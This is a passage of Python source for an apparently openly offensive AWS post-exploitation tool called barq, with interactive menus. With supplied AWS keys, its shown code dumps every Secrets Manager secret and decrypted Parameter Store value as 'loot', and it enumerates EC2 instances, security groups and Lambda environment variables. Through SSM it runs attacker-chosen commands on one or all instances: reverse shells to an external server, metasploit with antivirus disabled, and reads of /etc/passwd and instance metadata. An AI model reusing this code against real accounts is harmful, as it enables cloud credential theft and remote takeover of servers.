for cmd in INSTANCESIDCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def get_instance_details(caller):
"""
Return detailed info in JSON format about a particular instance.
:param caller: The menu that called this function.
:return: None
"""
global my_aws_creds
global ec2instances
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
try:
puts(color('[*] Your collected EC2 instances, if you want an updated list, invoke attacksurface:'))
instances_table = PrettyTable()
possible_regions = []
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name',
'Profile']
if len(ec2instances['instances']) == 0:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
for ins in ec2instances['instances']:
INSTANCESIDCOMMANDS.append(ins['id'])
instances_table.add_row([ins.get('id'), ins.get('platform'), ins.get('region'), ins.get('state'),
ins.get('public_ip_address'),
ins.get('public_dns_name'), ins.get('iam_profile', '')])
except Exception as e:
print(e)
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
print(instances_table)
puts(color('[*] Target Options:'))
#paster
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instanceidcomplete)
target = prompt.query('Type/Paste your target EC2 ID:')
region = ''
for ins in ec2instances['instances']:
if ins['id'] == target:
region = ins['region']
break
ec2client = mysession.client('ec2',region_name=region)
result = ec2client.describe_instances(InstanceIds=[target,])
jsonstr = json.dumps(result['Reservations'][0]['Instances'][0],indent=4, sort_keys=True, default=str)
print(highlight(jsonstr, JsonLexer(), TerminalFormatter()))
go_to_menu(caller)
def process_instances_command(command):
"""
Process command in the EC2 instances menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
instances_help()
elif command == 'where':
puts(colored.green("You are in EC2 instances menu"))
elif command == 'setprofile':
set_aws_creds('ec2instances')
elif command == 'showprofile':
show_aws_creds('ec2instances')
elif command == 'dumpsecrets':
find_all_creds('ec2instances')
elif command == 'attacksurface':
find_attacksurface('ec2instances')
elif command == 'showsecrets':
show_cred_loot('ec2instances')
elif command == 'securitygroups':
get_security_groups('ec2instances')
elif command == 'ec2attacks':
ec2attacks('ec2instances')
elif command == 'back':
#handle_menu()
menu_backward()
elif command == 'list':
get_ec2_instances('ec2instances')
elif command == 'commandresults':
check_command_invocations('ec2instances')
elif command == 'instance':
get_instance_details('ec2instances')
elif command == 'exit':
exit()
instances_loop()
def instances_loop():
"""
The command handler loop for the EC2 instances menu. Commands will be sent to the processor and the prompt will be displayed.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instancecomplete)
command = raw_input('barq '+color('instances','blue')+' > ')
except Exception as e:
print(e)
command = str(command)
process_instances_command(command)
except KeyboardInterrupt as k:
print("CTRL+C pressed.")
choice = prompt.query(color("Are you sure you want to go back to the main menu? Y/N",'red'), default='Y')
if choice == 'Y':
menu_backward()
else:
instances_loop()
def main_loop():
"""
The command handler loop for the main menu. Commands will be sent to the processor and the prompt will be displayed.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(maincomplete)
command = raw_input('barq '+color('main','green')+' > ')
except Exception as e:
exit()
#command = prompt.query('aws sheller main> ', validators=[])
command = str(command)
process_main_command(command)
except KeyboardInterrupt as k:
print(color("CTRL+C pressed. Exiting...",'red'))
exit()
def process_main_command(command):
"""
Process command in the main menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
main_help()
elif command == 'where':
puts(colored.green('You are in the main menu'))
elif command == 'back':
puts(colored.green('You are at the top menu.'))
elif command == 'exit':
#cleanup tasks
try:
exit()
except:
pass
elif command == 'setprofile':
set_aws_creds('main')
elif command == 'showprofile':
show_aws_creds('main')
elif command == 'dumpsecrets':
find_all_creds('main')
elif command == 'attacksurface':
find_attacksurface('main')
elif command == 'showsecrets':
show_cred_loot('main')
elif command == 'securitygroups':
get_security_groups('main')
elif command == 'training':
#menu_stack.append('training')
#handle_menu()
menu_forward('training')
elif command == 'ec2instances':
menu_forward('ec2instances')
main_loop()
def find_all_creds(caller):
"""
Find Secrets and Parameters stored in AWS Secrets Manager or Systems Manager Parameter store, respectively, for each region.
:param caller: calling menu to return to.
:return: None
"""
global my_aws_creds
global loot_creds
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
loot_creds = {'secrets':[],'tokens':[],'parameters':[]}
puts(color('[..] Now iterating over all regions to get secrets and parameters...'))
for region in possible_regions:
puts(color('[*] Region currently searched for secrets: %s'%region))
puts(color('[..] Now searching for secrets in Secret Manager'))
#if my_aws_creds['aws_session_token'] == '':
# mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
#else:
#mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=region, aws_session_token=my_aws_creds['aws_session_token'])
secretsclient = mysession.client(service_name='secretsmanager',region_name=region)
try:
secrets = secretsclient.list_secrets()['SecretList']
secretnames = []
for secret in secrets:
secretnames.append(secret['Name'])
for name in secretnames:
resp = secretsclient.get_secret_value(SecretId=name)
puts(color("Secret Name: %s" %name,"green"))
puts(color("Secret Value: %s" %resp['SecretString'],"green"))
resp2 = secretsclient.describe_secret(SecretId=name)
description = resp2.get('Description','')
loot_creds['secrets'].append({'name':name,'value':resp['SecretString'],'description':description})
except Exception as e:
print(e)
puts(color('[!] No secrets in this region\'s Secret Manager...'))
puts(color('[..] Now searching for secrets in Parameter Store'))
ssmclient = mysession.client('ssm',region_name=region)
try:
paramresponse = ssmclient.describe_parameters()
paramnames = []
for param in paramresponse.get('Parameters',[]):
if param.get('Name','') != '':
paramnames.append(param.get('Name'))
if len(paramnames) > 0:
getparamsresponse = ssmclient.get_parameters(Names=paramnames,WithDecryption=True).get('Parameters')
for getparam in getparamsresponse:
puts(color("Parameter Name: %s, Parameter Value: %s" %(getparam['Name'], getparam['Value']),"green"))
loot_creds['parameters'].append({'name':getparam['Name'],'value':getparam['Value']})
except Exception as e:
print(e)
puts(color('[!] No Parameters in this region\'s Parameter Store...'))
puts(color("[+] Done iterating on AWS secrets and parameters."))
go_to_menu(caller)
def show_cred_loot(caller):
"""
Show Secrets and Parameters looted from AWS Secrets Manager or Systems Manager Parameter store, respectively, for each region.
:param caller: calling menu to return to
:return: None
"""
global loot_creds
try:
if len(loot_creds.get('secrets')) < 1:
puts(color('[!] You have no stored secrets or parameters. Run the command dumpsecrets to set them'))
go_to_menu(caller)
puts(color('[*] Your collected secrets and credentials:'))
for secret in loot_creds['secrets']:
puts(color("===========",'blue'))
puts(color('[+] Name: %s'%secret.get('name')))
puts(color('[+] Value: %s' % secret.get('value')))
puts(color('[+] Description: %s' % secret.get('description')))
#puts(colored.green('name: %s, value: %s, description: %s'%(secret.get('name'),secret.get('value'), secret.get('description',''))))
for param in loot_creds['parameters']:
puts(color("===========", 'blue'))
puts(color('[+] Name: %s' % param.get('name')))
puts(color('[+] Value: %s' % param.get('value')))
#puts(colored.green('name: %s, value: %s'%(param.get('name'),param.get('value'))))
except Exception as e:
print(e)
puts(color('[!] A problem in finding stored secrets or parameters. Run the command dumpsecrets to set them'))
go_to_menu(caller)
def get_ec2_instances(caller):
"""
List discovered EC2 instances.
:param caller: Calling menu to return to.
:return: None
"""
global ec2instances
try:
puts(color('[*] Your collected EC2 instances, if you want an updated list, invoke attacksurface:'))
instances_table = PrettyTable()
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name',
'Profile']
for ins in ec2instances['instances']:
instances_table.add_row([ins.get('id'), ins.get('platform'), ins.get('region'), ins.get('state'),
ins.get('public_ip_address'),
ins.get('public_dns_name'), ins.get('iam_profile', '')])
print(instances_table)
except:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
def get_security_groups(caller):
"""
List security groups discovered.
:param caller: calling menu to return to.
:return: None
"""
global secgroups
try:
puts(color('[*] Your collected security groups, if you want an updated list, invoke attacksurface:'))
for group in secgroups['groups']:
puts(colored.green("Group ID: %s"%group.get('id','')))
puts(colored.green("Group description: %s"%group.get('description','')))
puts(colored.green('Group Ingress IP permissions:'))
for p in group['ip_permissions']:
ranges = ''
for iprange in p.get('ranges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
puts(colored.green('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' %(p.get('fromport','Any'),p.get('toport','Any'),p.get('protocol','All'),ranges)))
puts(colored.green('Group Egress IP permissions:'))
for p in group['ip_permissions_egress']:
ranges = ''
for iprange in p.get('ranges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
puts(colored.green('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' %(p.get('fromport','Any'),p.get('toport','Any'),p.get('protocol','All'),ranges)))
puts(colored.magenta('======================================='))
except Exception as e:
print(e)
puts(color('[!] You have no stored security groups. Run the command attacksurface to discover them'))
go_to_menu(caller)
def ec2attacks(caller):
"""
Perform various attacks against all eligible EC2 instances in the account, or choose a single EC2 instance to attack.
:param caller: Calling menu to return to.
:return: None
"""
global my_aws_creds
global ec2instances
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
mysession = ''
linux = False
windows = False
actual_targets = []
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
try:
puts(color('[*] Your collected EC2 instances, if you want an updated list, invoke attacksurface:'))
instances_table = PrettyTable()
possible_regions = []
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name', 'Profile']
if len(ec2instances['instances']) == 0:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
for ins in ec2instances['instances']:
if ins.get('iam_profile','') != '' and ins.get('state','') == 'running':
instances_table.add_row([ins.get('id'),ins.get('platform'),ins.get('region'),ins.get('state'),ins.get('public_ip_address'),
ins.get('public_dns_name'),ins.get('iam_profile','')])
actual_targets.append(ins)
INSTANCESIDCOMMANDS.append(ins['id'])
if ins.get('platform') == 'linux':
linux = True
else:
windows = True
except Exception as e:
print(e)
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
print(instances_table)
puts(color('[*] Target Options:'))
target_options = [{'selector':'1','prompt':'All EC2 instances','return':'all'},
{'selector':'2', 'prompt':'Single EC2 instance', 'return':'single'}]
target = prompt.options('Choose your target:', target_options)
if target == 'single':
#paster
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instanceidcomplete)
target = prompt.query('Type/Paste your target EC2 ID:')
if target == "all":
agree = prompt.query('This will launch the same attack on all EC2 instances. This is a very risky move! Do you want to proceed? Y/N?', default="N")
if agree != 'Y':
go_to_menu(caller)
puts(color('[*] EC2 Attack List:'))
attack_options = [{'selector':'1','prompt':'Download EC2 metadata and userdata (custom init script)','return':'metadata'},
{'selector':'2', 'prompt':'Display a file', 'return':'printfile'},
{'selector':'3','prompt':'Visit a URL from inside EC2 instance','return':'URL'},
{'selector':'4','prompt':'metasploit','return':'msf'},
{'selector':'5','prompt':'Run a command','return':'command'},
{'selector':'6','prompt':'Reverse Shell to external server','return':'reverseshell'}]
attack = prompt.options('Choose your attack mode:', attack_options)
if target != 'all':
success = attack_single_target(caller,target, attack)
elif target == "all":
targets = actual_targets
success = attack_multiple_targets(mysession,caller,targets, attack, linux, windows)
puts(color('[+] Done launching attacks. Check command results with commandresults option.'))
go_to_menu(caller)
def attack_single_target(caller,target, attack):
"""
Launch an attack on a single EC2 instance.
:param caller: Calling menu to return to.
:param target: Target EC2 instance id
:param attack: The attack to launch.
:return: True
"""
global ec2instances
target_id = ''
target_platform = ''
target_state = ''
target_region = ''
disableav = False
for ins in ec2instances['instances']:
if ins.get('id') == target:
target_id = target
target_platform = ins.get('platform')
target_state = ins.get('state')
target_region = ins.get('region')
if target_state != 'running':
puts(color('[!] The chosen target is not running! Exiting...'))
go_to_menu(caller)
if target_platform == 'linux':
action = 'AWS-RunShellScript'
else:
action = 'AWS-RunPowerShellScript'
remote_ip_host = ''
remote_port = ''
if attack == "reverseshell" or attack == "msf":
puts(colored.magenta('You chose the %s option. First provide your remote IP and port, then choose your shell options.' %attack))
remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
remote_port = prompt.query("Your remote port number:", default="4444")
if attack == "reverseshell":
attack, action = reverseshell_options(remote_ip_host, remote_port, target_platform)
elif attack == "msf":
attack, action = metasploit_installed_options(remote_ip_host, remote_port, target_platform)
disableav = True
elif attack == 'URL':
puts(color('[*] Choose the URL to visit from inside the EC2 instance:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
if target_platform == 'linux':
attack = "python -c \"import requests; print requests.get('%s').text;\"" %URL
else:
attack = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
elif attack == "metadata":
if target_platform == 'linux':
attack = PRINT_EC2_METADATA_CMD
else:
attack = PRINT_EC2_METADATA_PSH
elif attack == "printfile":
filepath = prompt.query('Enter the full file path: ', default="/etc/passwd")
attack = "cat %s" %filepath
elif attack == "command":
attack = prompt.query('Enter the full command to run: (bash for Linux - Powershell for Windows)', default="cat /etc/passwd")
disableav = True
puts(colored.cyan('Sending the command "%s" to the target instance %s....'%(attack,target)))
mysession = set_session_region(target_region)
ssmclient = mysession.client('ssm')
if target_platform == 'linux':
success = run_linux_command(ssmclient,target,action,attack)
else:
success = run_windows_command(ssmclient,target, action, attack, disableav)
return True
def attack_multiple_targets(mysession,caller,targets, attack, linux, windows):
"""
Launch commands against multiple EC2 instances
:param mysession: boto3 session object.
:param caller: calling menu to return to.
:param targets: List of target EC2 instances
:param attack: The attack/command type
:param linux: Whether or not Linux is included in the targets.
:param windows: Whether or not Windows is included in the targets.
:return: None
"""
global command_invocations
global logger
windowsaction = 'AWS-RunPowerShellScript'
linuxaction = 'AWS-RunShellScript'
disableav = False
if attack == "reverseshell" or attack == "msf":
puts(colored.magenta('Make sure your shell listener tool can handle multiple simultaneous connections!'))
disableav = True
if attack == "reverseshell":
linuxattack, windowsattack = reverseshell_multiple_options(linux, windows)
elif attack == "msf":
linuxattack, windowsattack = metasploit_installed_multiple_options(linux, windows)
elif attack == "URL":
puts(color('[*] Choose the URL to visit from inside the EC2 instances:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
linuxattack = "python -c \"import requests; print requests.get('%s').text;\"" %URL
windowsattack = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
elif attack == "metadata":
linuxattack = PRINT_EC2_METADATA_CMD
windowsattack = PRINT_EC2_METADATA_PSH
elif attack == "printfile":
linuxfilepath = prompt.query('(Ignore if linux is not targeted)Enter the full file path for Linux instances: ', default="/etc/passwd")
windowsfilepath = prompt.query('(Ignore if Windows is not targeted)Enter the full file path for Windows instances: ', default="C:\\Windows\\System32\\drivers\\etc\\hosts")
linuxattack = "cat %s" %linuxfilepath
windowsattack = "cat %s" %windowsfilepath
elif attack == "command":
linuxattack = prompt.query('(Ignore if linux is not targeted)Enter the full bash command to run: ', default="whoami")
windowsattack = prompt.query('(Ignore if Windows is not targeted)Enter the full Powershell command to run: ', default="whoami")
disableav = True
logger.error("before running threaded attacks")
for target in targets:
if target['platform'] == 'linux' and linux and target.get('iam_profile','') != '' and linuxattack != '':
#run_threaded_linux_command(mysession,target,linuxaction,linuxattack)
logger.error("running run_threaded_linux_command for %s" %target['id'])
linuxthread = Thread(target=run_threaded_linux_command, args=(mysession, target,linuxaction,linuxattack))
linuxthread.start()
logger.error("after running run_threaded_linux_command for %s" % target['id'])
if target['platform'] == 'windows' and windows and target.get('iam_profile','') != '' and windowsattack != '':
logger.error("running run_threaded_windows_command for %s" % target['id'])
#run_threaded_windows_command(mysession,target,windowsaction,windowsattack)
windowsthread = Thread(target=run_threaded_windows_command, args=(mysession, target,windowsaction,windowsattack,disableav))
windowsthread.start()
logger.error("after run_threaded_windows_command for %s" % target['id'])
#TODO: Decide best approach to launching and looping
#loop over instances launching attack against each
#loop over results.
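# One possible approach for the TODO above (a sketch, not part of the original
# code): keep each started Thread in a list and join them with a timeout before
# returning, so the results recorded by the run_threaded_* helpers are complete
# by the time commandresults is consulted.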
def check_command_invocations(caller):
"""
Check stored results of previously executed attacks on EC2 instances.
:param caller: calling menu
:return: None
"""
global command_invocations
if len(command_invocations['commands']) < 1:
puts(color('[!] You haven\'t run any commands against EC2 targets yet. Run ec2attacks to launch commands.'))
go_to_menu(caller)
for command in command_invocations['commands']:
puts(colored.green('command id: %s'%command.get('id') ))
puts(colored.green('command instance id: %s'%command.get('instanceid') ))
puts(colored.green('command state: %s'%command.get('state')))
puts(colored.green('command platform: %s'%command.get('platform')))
puts(colored.green('command region: %s'%command.get('region') ))
try:
puts(colored.green('command error: %s'%command.get('error','No errors')[0:5000]))
except:
pass
try:
puts(colored.green('command output: %s'%command.get('output', 'No output')[0:5000] ))
except:
pass
puts(colored.magenta('======================================='))
def find_attacksurface(caller):
"""
Find the attack surface of this AWS account. Currently looks for EC2 instances and Security Groups.
:param caller: calling menu
:return: None
"""
global my_aws_creds
global ec2instances
global secgroups
global lambdafunctions
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No AWS credentials set. Call setprofile first!"))
go_to_menu(caller)
ec2instances = {'instances':[]}
secgroups = {'groups':[]}
puts(color('[..] Now iterating over all regions to discover public attack surface...'))
for region in possible_regions:
puts(color('[*] Region currently searched for details: %s'%region))
#if my_aws_creds['aws_session_token'] == '':
# mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
#else:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
ec2resource = mysession.resource('ec2')
lambdaclient = mysession.client('lambda')
instances = ec2resource.instances.all()
puts(color('[..] Now searching for details of EC2 instances'))
for instance in instances:
puts(color('[..] Now checking instance with id: %s'%instance.instance_id))
puts(color('[+] Public host name: %s'%instance.public_dns_name))
puts(color('[+] Public IP: %s'%instance.public_ip_address))
platform = ''
if instance.platform == "windows":
platform = 'windows'
puts(color('[+] OS is: Windows'))
else:
platform = 'linux'
puts(color('[+] OS is: Linux'))
puts(color('[+] AMI id: %s'%instance.image_id))
puts(color('[+] State: %s'%instance.state['Name']))
puts(color('[+] Region: %s'%region))
profile = instance.iam_instance_profile
if profile:
profile = profile['Arn'].rsplit('/',1)[-1]
else:
profile = ''
puts(colored.magenta(''))
ec2instances['instances'].append({'id':instance.instance_id,'public_dns_name':instance.public_dns_name,'public_ip_address':instance.public_ip_address,
'platform':platform,'ami_id':instance.image_id,'state':instance.state['Name'],'region':region,'iam_profile':profile})
puts(color('[..] Now searching for details of security groups'))
security_groups = ec2resource.security_groups.all()
for group in security_groups:
thisgroup = {}
thisgroup['description'] = group.description
thisgroup['id'] = group.id
puts(colored.magenta("group id: %s" %group.id))
puts(colored.magenta( "group ip permissions"))
ip_permissions = []
for rule in group.ip_permissions:
ranges = ''
for iprange in rule.get('IpRanges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
if ranges == '':
ranges = 'None'
protocol = rule.get('IpProtocol')
# AWS uses IpProtocol '-1' to mean all protocols
if protocol == '-1':
protocol = 'All'
fromport = rule.get('FromPort','Any')
toport = rule.get('ToPort','Any')
puts(colored.magenta( "Ingress Rule: fromport: %s, toport: %s, protocol: %s, IP ranges: %s" %(fromport,toport,protocol,ranges)))
ip_permissions.append({'protocol':protocol,'fromport':fromport, 'toport':toport,'ranges':rule.get('IpRanges',[])})
puts(colored.magenta( "group ip permissions egress"))
ip_permissions_egress = []
for rule in group.ip_permissions_egress:
ranges = ''
for iprange in rule.get('IpRanges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
if ranges == '':
ranges = 'None'
protocol = rule.get('IpProtocol')
# AWS uses IpProtocol '-1' to mean all protocols
if protocol == '-1':
protocol = 'All'
fromport = rule.get('FromPort','Any')
toport = rule.get('ToPort','Any')
puts(colored.magenta( "Egress Rule: fromport: %s, toport: %s, protocol: %s, IP ranges: %s" %(fromport,toport,protocol,ranges)))
ip_permissions_egress.append({'protocol':protocol,'fromport':fromport, 'toport':toport,'ranges':rule.get('IpRanges',[])})
thisgroup['ip_permissions'] = ip_permissions
thisgroup['ip_permissions_egress'] = ip_permissions_egress
secgroups['groups'].append(thisgroup)
puts(color('[..] Now searching for details of lambda functions'))
function_results = lambdaclient.list_functions()
functions = function_results['Functions']
for function in functions:
function_name = function['FunctionName']
function_arn = function['FunctionArn']
function_runtime = function.get('Runtime','')
function_role = function.get('Role','')
function_description = function.get('Description','')
function_Environment = function.get('Environment',{})
puts(color('[+] Function Name: %s'%function_name))
puts(color('[+] Function ARN: %s'%function_arn))
puts(color('[+] Function Runtime: %s'%function_runtime))
puts(color('[+] Function Role: %s'%function_role))
puts(color('[+] Function Description: %s'%function_description))
puts(color('[+] Function Environment variables: %s'%function_Environment))
lambdafunctions['functions'].append({'name':function_name,'function_arn':function_arn,'function_runtime':function_runtime,
'function_role':function_role,'function_description':function_description,'function_Environment':function_Environment,'region':region})
go_to_menu(caller)
def set_aws_creds(caller):
"""
Set the AWS credentials of the targeted AWS account.
:param caller: Calling menu
:return: None
"""
global menu_stack
global my_aws_creds
readline.set_completer(None)
aws_access_key_id = getpass('Enter your AWS Access Key ID:')
puts(color("[*] Key id is: %s************%s"%(aws_access_key_id[0:2],aws_access_key_id[-3:-1])))
aws_secret_access_key = getpass('Enter AWS Secret Access Key:')
puts(color("[*] secret key is: %s************%s"%(aws_secret_access_key[0:2],aws_secret_access_key[-3:-1])))
aws_session_token = getpass("Enter your session token, only if needed: ")
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name='us-west-2')
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name='us-west-2', aws_session_token=aws_session_token)
ec2client = mysession.client('ec2')
regionresponse = ''
choose_your_region = False
possible_regions = []
try:
regionresponse = ec2client.describe_regions()
except Exception as e:
if "OptInRequired" in str(e):
puts(color("[!] OptInRequired Error: The keys are valid but you have a problem in your AWS account."
"Your account may be under validation by AWS. Is it a new account?"))
elif "UnauthorizedOperation" in str(e):
choose_your_region = True
else:
puts(color("[!] Error accessing AWS services. Double check your AWS keys, tokens, privileges and region."))
print(e)
if choose_your_region == False:
go_to_menu(caller)
if choose_your_region == True:
chosen_region = prompt.query('What is your preferred AWS region?',default='us-east-1')
else:
regions = regionresponse['Regions']
region_table = PrettyTable(['Region'])
possible_regions = []
for region in regions:
region_table.add_row([region['RegionName']])
possible_regions.append(region['RegionName'])
print(region_table)
chosen_region = prompt.query('What is your preferred AWS region?',default='us-east-1')
if chosen_region not in possible_regions:
puts(color("[!] Invalid AWS region! Exiting...."))
exit()
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=chosen_region)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=chosen_region,aws_session_token=aws_session_token)
my_aws_creds = {'aws_access_key_id':aws_access_key_id,'aws_secret_access_key':aws_secret_access_key,'region_name':chosen_region,'aws_session_token':aws_session_token,'session':mysession,'possible_regions':possible_regions}
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)#menu_backward()
def set_aws_creds_inline(aws_access_key_id,aws_secret_access_key,region_name,aws_session_token):
"""
Set AWS credentials to the target account from the command line arguments directly, no prompts.
:param aws_access_key_id: access key id
:param aws_secret_access_key: access secret key
:param region_name: region name
:param aws_session_token: token, if any
:return: None
"""
global my_aws_creds
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name, aws_session_token=aws_session_token)
ec2client = mysession.client('ec2')
regionresponse = ''
try:
regionresponse = ec2client.describe_regions()
except Exception as e:
if "OptInRequired" in str(e):
puts(color("[!] OptInRequired Error: The keys are valid but you have a problem in your AWS account."
"Your account may be under validation by AWS. Is it a new account?"))
else:
puts(color("[!] Error accessing AWS services. Double check your AWS keys, tokens, privileges and region."))
exit()
regions = regionresponse['Regions']
possible_regions = []
for region in regions:
possible_regions.append(region['RegionName'])
if region_name not in possible_regions:
puts(color("[!] Invalid AWS region! Exiting...."))
exit()
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name,aws_session_token=aws_session_token)
my_aws_creds = {'aws_access_key_id':aws_access_key_id,'aws_secret_access_key':aws_secret_access_key,'region_name':region_name,'aws_session_token':aws_session_token,'session':mysession,'possible_regions':possible_regions}
def show_aws_creds(caller):
"""
List AWS credentials used to connect to this AWS account.
:param caller: calling menu
:return: None
"""
global menu_stack
global my_aws_creds
if my_aws_creds == {}:
puts(color('[!] You haven\'t set your AWS credentials yet. Run the command setprofile to set them'))
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)
try:
puts(color('[+] Your AWS credentials:'))
puts(color('[*] access key id: %s'%my_aws_creds['aws_access_key_id']))
puts(color('[*] secret access key: %s'%my_aws_creds['aws_secret_access_key']))
puts(color('[*] session token: %s'%my_aws_creds['aws_session_token']))
puts(color('[*] region: %s'%my_aws_creds['region_name']))
except:
puts(color('[!] You haven\'t set your AWS credentials yet. Run the command setprofile to set them'))
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)
def main_help():
"""
Display Main Menu help options.
:return: None
"""
print(""" Main Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
showsecrets - Show credentials and secrets acquired from the target AWS account
training - Go to training mode
dumpsecrets - Gather and dump credentials of EC2 in Secrets Manager and Parameter Store
attacksurface - Discover attack surface of target AWS account
addtosecgroups - Add IPs and ports to security groups
persistence - Add persistence and hide deeper
ec2instances - Go to EC2 instances menu
securitygroups - List all discovered Security Groups
""")
main_loop()
MAINCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'showsecrets',
'training','dumpsecrets','attacksurface','addtosecgroups','persistence','ec2instances','securitygroups']
def maincomplete(text, state):
"""
Autocomplete for the main menu commands.
"""
for cmd in MAINCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def training_help():
"""
Display command options for the training menu.
:return: None
"""
print(""" Training Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
start - Start training mode
""")
training_loop()
TRAININGCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'start']
def trainingcomplete(text, state):
"""
Autocomplete for training menu.
"""
for cmd in TRAININGCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def instances_help():
"""
Display command options for the EC2 instances menu.
:return:
"""
print(""" EC2 instances Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
showsecrets - Show credentials and secrets acquired from the target AWS account
ec2attacks - Launch attacks against running EC2 instances
list - List all discovered EC2 instances
dumpsecrets - Gather and dump credentials of EC2 in Secrets Manager and Parameter Store
attacksurface - Discover attack surface of target AWS account
securitygroups - List all discovered Security Groups
commandresults - Check command results
instance - Get more details about an instance
""")
instances_loop()
INSTANCESCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'showsecrets',
'ec2attacks','dumpsecrets','attacksurface','list','commandresults','securitygroups', 'instance']
def instancecomplete(text, state):
"""
Autocomplete for EC2 instances menu
"""
for cmd in INSTANCESCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
asciilogo = """
.
:y-
:yy:
/ys/:`
/yo/::-
/y+/::::`
+y/+:::::-
+s:+:::::::`
`+s-+::::::::-
`oo.o/:::::::-`
`o+.o/::::::::
`o/`s/::::::/o:
`o:`s+::::::/sy`
.o-`s+-----::+++..........`
